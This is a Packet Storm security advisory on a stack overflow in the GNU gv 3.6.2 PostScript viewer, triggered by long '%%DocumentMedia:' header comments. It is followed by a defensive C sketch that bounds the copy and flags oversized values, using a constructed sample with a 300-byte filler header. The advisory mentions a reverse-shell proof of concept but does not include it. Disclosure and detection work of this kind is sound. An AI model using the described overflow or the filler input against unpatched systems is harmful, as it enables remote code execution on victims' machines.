gnugv362.txt

13 Nov 2006 00:00:00 | Reported by Renaud Lifchitz | Type: packetstorm | Source: packetstormsecurity.com

GNU gv vulnerability in PS file viewer with remote code executio

`GNU gv Stack Overflow Vulnerability  
  
  
//----- Advisory  
  
  
Program : GNU gv  
Homepage : http://www.gnu.org/software/gv/  
Tested version : 3.6.2  
Found by : r.lifchitz at sysdream dot com  
This advisory : r.lifchitz at sysdream dot com  
Discovery date : 2006/11/06  
Vendor notified : 2006/11/09  
  
  
//----- Application description  
  
  
gv is a comfortable viewer of PostScript and PDF files for the X  
Window System. It uses the ghostscript PostScript interpreter  
and is based on the classic X front-end for gs, ghostview, which  
it has replaced now.  
  
  
//----- Description of vulnerability  
  
  
The 'gv' viewer is prone to a remote stack overflow  
vulnerability. This issue exists because the application fails  
to perform proper boundary checks before copying user-supplied  
data into process buffers. A remote attacker may execute arbitrary  
code in the context of a user running the application. As a result,  
the attacker can gain unauthorized access to the vulnerable computer.  
  
This issue presents itself in the 'ps_gettext()' function residing  
in the 'ps.c' file.  
  
Long comments in some specific headers (such as '%%DocumentMedia:')  
of PS files are unconditionally copied into 'text', a 257 character  
buffer on the stack.  
  
This issue is reported to affect gv 3.6.2, but earlier versions are  
likely prone to this vulnerability as well. Applications using embedded  
gv code may also be vulnerable.  
  
  
//----- Proof Of Concept  
  
  
* Linux IA32 Reverse TCP Shell on 192.168.110.247:4321 (uuencoded  
exploit) :  
  
  
  
Use:  
$ uudecode < this-advisory.txt  
to extract the exploit.  
  
  
//----- Solution  
  
  
No known solution. You have to wait for a vendor upgrade and  
be careful with unknown PS files.  
  
  
//----- Impact  
  
  
Successful exploitation leads to remote code execution.  
  
  
//----- Credits  
  
  
Renaud Lifchitz  
r.lifchitz at sysdream dot com  
http://www.sysdream.com/  
  
  
//----- Greetings  
  
  
Thanks to Ali Rahbar  
  
  
  
`
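The advisory attributes the overflow to header comment text being copied into a 257-byte stack buffer without a length check. The following C sketch is an added example, not gv's source code: it shows a bounded copy for such a buffer and uses it to flag PostScript header comments whose value would not fit. The names `copy_bounded`, `count_oversized_dsc` and `build_sample` are hypothetical, and the sample document is constructed.

```c
#include <stdio.h>
#include <string.h>
#define TEXT_BUF 257 /* size of the stack buffer 'text' given in the advisory */

/* Copy at most dstsz-1 bytes and always NUL-terminate.
 * Returns 1 when the source did not fit and was truncated. */
int copy_bounded(char *dst, size_t dstsz, const char *src, size_t srclen)
{
    size_t n = srclen < dstsz - 1 ? srclen : dstsz - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return srclen > n;
}

/* Count "%%Keyword: value" lines whose value exceeds TEXT_BUF-1 bytes. */
size_t count_oversized_dsc(const char *doc, size_t len)
{
    size_t hits = 0, pos = 0;
    while (pos < len) {
        const char *line = doc + pos;
        const char *nl = memchr(line, '\n', len - pos);
        size_t linelen = nl ? (size_t)(nl - line) : len - pos;
        const char *colon = (linelen >= 2 && line[0] == '%' && line[1] == '%')
                                ? memchr(line, ':', linelen) : NULL;
        if (colon) {
            char text[TEXT_BUF];
            size_t vlen = linelen - (size_t)(colon + 1 - line);
            hits += copy_bounded(text, sizeof text, colon + 1, vlen);
        }
        pos += linelen + 1;
    }
    return hits;
}

/* Constructed sample (needs cap >= 400): one ordinary header comment and
 * one header comment carrying a 300-byte filler value. */
size_t build_sample(char *buf, size_t cap)
{
    int n = snprintf(buf, cap, "%%!PS-Adobe-3.0\n%%%%Title: hello.ps\n%%%%DocumentMedia: ");
    memset(buf + n, 'A', 300);
    memcpy(buf + n + 300, "\n%%EndComments\n", 15);
    return (size_t)n + 300 + 15;
}

int main(void)
{
    char doc[512];
    size_t len = build_sample(doc, sizeof doc);
    printf("oversized DSC values: %zu\n", count_oversized_dsc(doc, len));
    return 0;
}
```

A non-zero count on an untrusted file is a reason to keep it away from an unpatched viewer; the same length check belongs in any parser that copies header text into a fixed-size buffer.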
